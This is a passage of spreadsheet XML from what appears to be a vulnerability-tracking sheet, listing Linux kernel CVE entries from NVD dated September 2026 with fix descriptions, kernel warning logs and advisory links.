      <c r="F924" s="5" t="inlineStr"/>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="inlineStr"/>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr"/>
      <c r="L924" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q924" s="5" t="inlineStr"/>
      <c r="R924" s="5" t="inlineStr"/>
      <c r="S924" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ipoib: Drain RCU callbacks during module teardown
IPoIB reclamation completions can be signaled from inside an RCU callback.
Teardown can wake before the callback returns and unload ib_ipoib while its
code is still executing.
Client registration failure can also remove already-added devices and queue
callbacks. Wait after client and workqueue teardown.</t>
        </is>
      </c>
      <c r="T924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93108</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93109</t>
        </is>
      </c>
      <c r="D925" s="5" t="inlineStr"/>
      <c r="E925" s="5" t="inlineStr"/>
      <c r="F925" s="5" t="inlineStr"/>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="inlineStr"/>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr"/>
      <c r="L925" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q925" s="5" t="inlineStr"/>
      <c r="R925" s="5" t="inlineStr"/>
      <c r="S925" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Drain RCU callbacks during module teardown
devx_free_subscription() can remain queued after the last DevX event file
drops its module reference or an auxiliary driver detaches its devices.
mlx5_ib can then unload before the callback runs.
Registration error unwind has the same risk because driver registration
can attach existing devices before failing. Wait after all drivers have
stopped.</t>
        </is>
      </c>
      <c r="T925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93109</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93110</t>
        </is>
      </c>
      <c r="D926" s="5" t="inlineStr"/>
      <c r="E926" s="5" t="inlineStr"/>
      <c r="F926" s="5" t="inlineStr"/>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="inlineStr"/>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q926" s="5" t="inlineStr"/>
      <c r="R926" s="5" t="inlineStr"/>
      <c r="S926" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Wait for RCU callbacks before unloading ib_core
put_gid_ndev() is queued with call_rcu() and implemented in ib_core.
Stopping the workqueues does not drain callbacks already queued, so RCU
could invoke it after the module code has been unloaded.
synchronize_rcu() does not wait for callbacks. Wait for them after all
producers have stopped.</t>
        </is>
      </c>
      <c r="T926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93110</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93111</t>
        </is>
      </c>
      <c r="D927" s="5" t="inlineStr"/>
      <c r="E927" s="5" t="inlineStr"/>
      <c r="F927" s="5" t="inlineStr"/>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="inlineStr"/>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr"/>
      <c r="L927" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q927" s="5" t="inlineStr"/>
      <c r="R927" s="5" t="inlineStr"/>
      <c r="S927" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark tracing_multi trampolines as ftrace managed
Since tracing_multi link does not set ftrace_managed, it would fail to
release the tracing_multi link when attaching tracing_multi link and
then attaching fentry link.
[    3.714215] WARNING: kernel/bpf/trampoline.c:1727 at bpf_trampoline_multi_detach+0x20b/0x240, CPU#1: test_progs/97
...
[    3.733170]  bpf_tracing_multi_link_release+0x14/0x30
[    3.733890]  bpf_link_free+0x58/0x130
[    3.734414]  bpf_link_release+0x23/0x30
Fix it by setting 'ftrace_managed = true' in register_fentry_multi().</t>
        </is>
      </c>
      <c r="T927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93111</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93112</t>
        </is>
      </c>
      <c r="D928" s="5" t="inlineStr"/>
      <c r="E928" s="5" t="inlineStr"/>
      <c r="F928" s="5" t="inlineStr"/>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="inlineStr"/>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr"/>
      <c r="K928" s="5" t="inlineStr"/>
      <c r="L928" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q928" s="5" t="inlineStr"/>
      <c r="R928" s="5" t="inlineStr"/>
      <c r="S928" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Require a BPF cpumask for bpf_cpumask_populate()
bpf_cpumask_populate() writes to its destination with bitmap_copy(), but
the destination is typed as struct cpumask *. That allows the verifier to
accept borrowed cpumask pointers returned by read-only kfuncs, such as
scx_bpf_get_online_cpumask(), as a writable destination.
Make the destination a struct bpf_cpumask * so populate follows the same
ownership rule as the other mutating cpumask kfuncs. Query kfuncs continue
to accept const struct cpumask * inputs.</t>
        </is>
      </c>
      <c r="T928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93112</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93113</t>
        </is>
      </c>
      <c r="D929" s="5" t="inlineStr"/>
      <c r="E929" s="5" t="inlineStr"/>
      <c r="F929" s="5" t="inlineStr"/>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="inlineStr"/>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr"/>
      <c r="L929" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q929" s="5" t="inlineStr"/>
      <c r="R929" s="5" t="inlineStr"/>
      <c r="S929" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: camcc-sc8280xp: unregister CAMCC_GDSC_CLK
With the introduction of sync_state support in the clk and pmdomain
subsystems, the following warning happens when the unused clocks are
shutdown in camcc-sc8280xp:
    [   15.408367] titan_top_gdsc status stuck at 'on'
    [   15.408429] WARNING: drivers/clk/qcom/gdsc.c:178 at gdsc_toggle_logic+0x14c/0x160, CPU#2: kworker/u32:1/14
    [   15.408462] Modules linked in: bnep vfat fat ath11k_pci(+) ath11k mac80211 cfg80211 mhi libarc4 snd_soc_wcd938x snd_soc_wcd938x_sdw snd_soc_wcd_classh hci_uart snd_soc_wcd_common
    snd_soc_sc8280xp soundwire_qcom snd_soc_wcd_mbhc snd_soc_qcom_sdw slimbus snd_soc_qcom_common regmap_sdw btqca btrtl qcom_camss soundwire_bus btbcm btintel snd_soc_sdca snd_soc_lpass_wsa_macro
    bluetooth snd_soc_lpass_tx_macro snd_soc_lpass_va_macro snd_soc_lpass_rx_macro snd_soc_hdmi_codec snd_soc_lpass_macro_common videobuf2_dma_sg ov5675 v4l2_fwnode videobuf2_memops
    qcom_spmi_adc5 snd_soc_core qcom_spmi_adc_tm5 videobuf2_v4l2 snd_seq snd_seq_device videobuf2_common v4l2_async qcom_vadc_common qcom_spmi_temp_alarm pm8941_pwrkey industrialio videodev
    snd_compress rfkill ac97_bus snd_pcm_dmaengine qcom_tsens mc qcom_edac snd_pcm pci_pwrctrl_pwrseq qcom_cpufreq_hw snd_timer snd qcomtee soundcore tee leds_gpio joydev binfmt_misc zram
    lz4hc_compress governor_simpleondemand panel_edp msm xhci_plat_hcd nvme nvme_core dwc3 qcom_pm8008_regulator
    [   15.408688]  ucsi_glink nvme_keyring nvme_auth pmic_glink_altmode udc_core typec_ucsi aux_hpd_bridge qcom_battmgr ulpi ubwc_config socinfo ocmem drm_gpuvm qcom_q6v5_pas drm_exec
    qcom_pil_info leds_qcom_lpg gpu_sched led_class_multicolor rtc_pm8xxx qcom_pbs qcom_common drm_display_helper qcom_pon qcom_glink_smem qcom_glink ghash_ce pwrseq_qcom_wcn gpio_sbu_mux
    qcom_stats phy_qcom_qmp_combo qcom_q6v5 gf128mul cec dispcc_sc8280xp phy_qcom_edp camcc_sc8280xp i2c_qcom_cci qcom_sysmon drm_dp_aux_bus mdt_loader aux_bridge qcom_pm8008 i2c_hid_of_elan
    dwc3_qcom_legacy llcc_qcom icc_bwmon gpi typec qcom_refgen_regulator phy_qcom_qmp_usb nvmem_qfprom qcom_ipcc phy_qcom_snps_femto_v2 gpucc_sc8280xp pinctrl_sc8280xp_lpass_lpi qcom_hwspinlock
    pinctrl_lpass_lpi lpasscc_sc8280xp qrtr qcom_aoss pmic_glink pdr_interface phy_qcom_qmp_pcie qcom_smd qcom_pdr_msg icc_osm_l3 qcom_wdt qmi_helpers qcom_rng smp2p rpmsg_core gpio_keys pwm_bl
    smem hid_multitouch fuse i2c_dev
    [   15.408928] CPU: 2 UID: 0 PID: 14 Comm: kworker/u32:1 Not tainted 7.1.0+ #2 PREEMPT(lazy)
    [   15.408937] Hardware name: LENOVO 21BX0016US/21BX0016US, BIOS N3HET88W (1.60 ) 03/14/2024
    [   15.408942] Workqueue: pm pm_runtime_work
    [   15.408959] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
    [   15.408967] pc : gdsc_toggle_logic+0x14c/0x160
    [   15.408978] lr : gdsc_toggle_logic+0x14c/0x160
    [   15.408987] sp : ffff8000800f3b40
    [   15.408991] x29: ffff8000800f3b40 x28: 0000000000000000 x27: 0000000000000000
    [   15.409003] x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000
    [   15.409014] x23: 0000000000000000 x22: 0000000000000001 x21: ffffa33f298fca88
    [   15.409024] x20: 0000000000000000 x19: ffffa33f298fc5b0 x18: 00cd15db75dacefd
    [   15.409035] x17: 000000040044ffff x16: ffffa33f3b1a3d88 x15: 726f776b80000002
    [   15.409045] x14: ffffffffffffffff x13: 0000000000000028 x12: 0101010101010101
    [   15.409056] x11: 7f7f7f7f7f7f7f7f x10: fefeff3039313274 x9 : ffffa33f3a5edafc
    [   15.409067] x8 : ffff8000800f3780 x7 : 0000000000000001 x6 : 0000000000000001
    [   15.409078] x5 : ffff000bf3ca1288 x4 : 0000000000000000 x3 : ffff5cccb6a3f000
    [   15.409088] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff000080ae0000
    [   15.409098] Call trace:
    [   15.409103]  gdsc_toggle_logic+0x14c/0x160 (P)
    [   15.409115]  gdsc_disable+0x4c/0x190
    [   15.409126]  _genp
---truncated---</t>
        </is>
      </c>
      <c r="T929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93113</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93114</t>
        </is>
      </c>
      <c r="D930" s="5" t="inlineStr"/>
      <c r="E930" s="5" t="inlineStr"/>
      <c r="F930" s="5" t="inlineStr"/>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="inlineStr"/>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q930" s="5" t="inlineStr"/>
      <c r="R930" s="5" t="inlineStr"/>
      <c r="S930" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/surface: acpi-notify: Check ACPI companion before use
Since every platform driver can be forced to match a device that doesn't
match its list of device IDs because of device_match_driver_override(),
platform drivers that rely on the existence of a device's ACPI companion
object should verify its presence.
san_probe() dereferences the result of ACPI_COMPANION() when installing
the GSBUS address space handler, so force-binding the driver to a device
without an ACPI companion leads to a NULL pointer dereference.  The
dereference was introduced when the probe function was switched from
ACPI_HANDLE() to ACPI_COMPANION().
Check the ACPI companion against NULL and return -ENODEV when it is
missing, like commit e4865a56d013 ("ACPI: driver: Check ACPI_COMPANION()
against NULL during probe") does for the core ACPI platform drivers.</t>
        </is>
      </c>
      <c r="T930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93114</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93115</t>
        </is>
      </c>
      <c r="D931" s="5" t="inlineStr"/>
      <c r="E931" s="5" t="inlineStr"/>
      <c r="F931" s="5" t="inlineStr"/>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="inlineStr"/>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr"/>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q931" s="5" t="inlineStr"/>
      <c r="R931" s="5" t="inlineStr"/>
      <c r="S931" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/mellanox: mlxbf-pmc: Check ACPI_COMPANION() against NULL
Every platform driver can be forced to match a device that doesn't match
its list of device IDs because of device_match_driver_override(), so
platform drivers that rely on the existence of a device's ACPI companion
object need to verify its presence.
mlxbf_pmc_probe() passes the result of ACPI_COMPANION() to
acpi_device_hid(), which dereferences it, so force-binding the driver to
a device without an ACPI companion leads to a NULL pointer dereference.
Accordingly, add a requisite ACPI_COMPANION() check against NULL to the
mlxbf-pmc driver and return -ENODEV when the companion is missing.</t>
        </is>
      </c>
      <c r="T931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93115</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93116</t>
        </is>
      </c>
      <c r="D932" s="5" t="inlineStr"/>
      <c r="E932" s="5" t="inlineStr"/>
      <c r="F932" s="5" t="inlineStr"/>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="inlineStr"/>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr"/>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q932" s="5" t="inlineStr"/>
      <c r="R932" s="5" t="inlineStr"/>
      <c r="S932" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: asus-wmi: fix resource leaks on probe failure
During driver initialization in asus_wmi_add(), various subsystems are
registered sequentially. However, the error path labels are out of order
relative to the registration sequence.
Specifically:
1. If asus_wmi_custom_fan_curve_init() fails, the driver jumps to
   fail_custom_fan_curve. Because this label is placed below fail_sysfs,
   it bypasses the cleanup calls for the input device and sysfs groups,
   which were successfully registered before, leaking those resources.
2. If asus_screenpad_init() fails, the driver jumps to fail_screenpad.
   Because fail_screenpad is placed below fail_backlight, it bypasses the
   cleanup calls for backlight and rfkill, leaking those resources.
Fix these resource leaks by reordering the error path labels in
asus_wmi_add() to match the exact reverse order of the resource
allocations.</t>
        </is>
      </c>
      <c r="T932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93116</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93117</t>
        </is>
      </c>
      <c r="D933" s="5" t="inlineStr"/>
      <c r="E933" s="5" t="inlineStr"/>
      <c r="F933" s="5" t="inlineStr"/>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="inlineStr"/>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr"/>
      <c r="L933" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q933" s="5" t="inlineStr"/>
      <c r="R933" s="5" t="inlineStr"/>
      <c r="S933" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: fix UAF when probe runs concurrent to dyn ID removal
Dynamic IDs are only guaranteed to be valid when usb_dynids_lock is held,
as remove_id_store can free the node. Thus, make a copy in
usb_probe_interface. Clarify the documentation that the id parameter is
only valid during the probe.
USB serial has the same pattern, but it does not need fixing as the IDs
cannot be removed via sysfs.</t>
        </is>
      </c>
      <c r="T933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93117</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93118</t>
        </is>
      </c>
      <c r="D934" s="5" t="inlineStr"/>
      <c r="E934" s="5" t="inlineStr"/>
      <c r="F934" s="5" t="inlineStr"/>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="inlineStr"/>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr"/>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q934" s="5" t="inlineStr"/>
      <c r="R934" s="5" t="inlineStr"/>
      <c r="S934" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: aspeed_udc: check endpoint DMA allocation
ast_udc_probe() allocates a coherent DMA buffer used as the backing store
for endpoint buffers. ast_udc_init_ep() derives per-endpoint buffer
pointers from udc-&gt;ep0_buf, so a failed allocation is dereferenced during
probe.
Check the allocation before endpoint setup. The existing probe error path
called ast_udc_remove(), which unregisters the gadget unconditionally and
is not safe before usb_add_gadget_udc() succeeds. Add a local cleanup
helper for probe failures so pre-registration failures only unwind the
resources that were actually initialized.
This was found by a local static analysis checker for unchecked allocator
returns while scanning Linux 6.16. The change was checked by applying it
to current mainline and by running checkpatch. I do not have access to
Aspeed UDC hardware, so no runtime testing was performed.</t>
        </is>
      </c>
      <c r="T934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93118</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93119</t>
        </is>
      </c>
      <c r="D935" s="5" t="inlineStr"/>
      <c r="E935" s="5" t="inlineStr"/>
      <c r="F935" s="5" t="inlineStr"/>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="inlineStr"/>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q935" s="5" t="inlineStr"/>
      <c r="R935" s="5" t="inlineStr"/>
      <c r="S935" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: ljca: bound bank_num in ljca_enumerate_gpio()
ljca_enumerate_gpio() reads desc-&gt;bank_num from the device and loops
valid_pin[i] = get_unaligned_le32(...) for i &lt; bank_num. valid_pin[]
holds only LJCA_MAX_GPIO_NUM / 32 = 2 entries.
Two checks run before the loop. The reply length must match
struct_size(desc, bank_desc, bank_num). The product
pins_per_bank * bank_num must not exceed LJCA_MAX_GPIO_NUM. Neither one
bounds bank_num against the size of valid_pin[]. The reply is capped at
LJCA_MAX_PAYLOAD_SIZE (60) bytes, so the struct_size check limits
bank_num to 9. A device that reports bank_num 9 with pins_per_bank 7
still passes both checks. gpio_num is 63 and the reply is 56 bytes. The
loop then writes nine u32 into the two entry array and overruns
valid_pin[] on the stack.
A broken or malicious LJCA device can therefore overflow the stack.
Reject a bank_num that does not fit valid_pin[].</t>
        </is>
      </c>
      <c r="T935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93119</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93120</t>
        </is>
      </c>
      <c r="D936" s="5" t="inlineStr"/>
      <c r="E936" s="5" t="inlineStr"/>
      <c r="F936" s="5" t="inlineStr"/>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="inlineStr"/>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q936" s="5" t="inlineStr"/>
      <c r="R936" s="5" t="inlineStr"/>
      <c r="S936" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: configfs: fix out-of-bounds read of qw_sign
os_desc_qw_sign_show() passes OS_STRING_QW_SIGN_LEN as the input
length to utf16s_to_utf8s(), but that argument counts UTF-16 code
units while OS_STRING_QW_SIGN_LEN (14) is the byte size of qw_sign[].
The array holds only OS_STRING_QW_SIGN_LEN / 2 (7) code units, so the
conversion reads up to 7 units (14 bytes) past the end of qw_sign[]
into the following members of struct gadget_info when the stored
signature fills the array without a NUL terminator, exposing those
bytes through the configfs attribute.
The store path halves the count for its input bound but passes the
full byte count as the utf8s_to_utf16s() output limit; use the
destination code-unit count in both directions.</t>
        </is>
      </c>
      <c r="T936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93120</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93121</t>
        </is>
      </c>
      <c r="D937" s="5" t="inlineStr"/>
      <c r="E937" s="5" t="inlineStr"/>
      <c r="F937" s="5" t="inlineStr"/>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="inlineStr"/>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr"/>
      <c r="L937" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
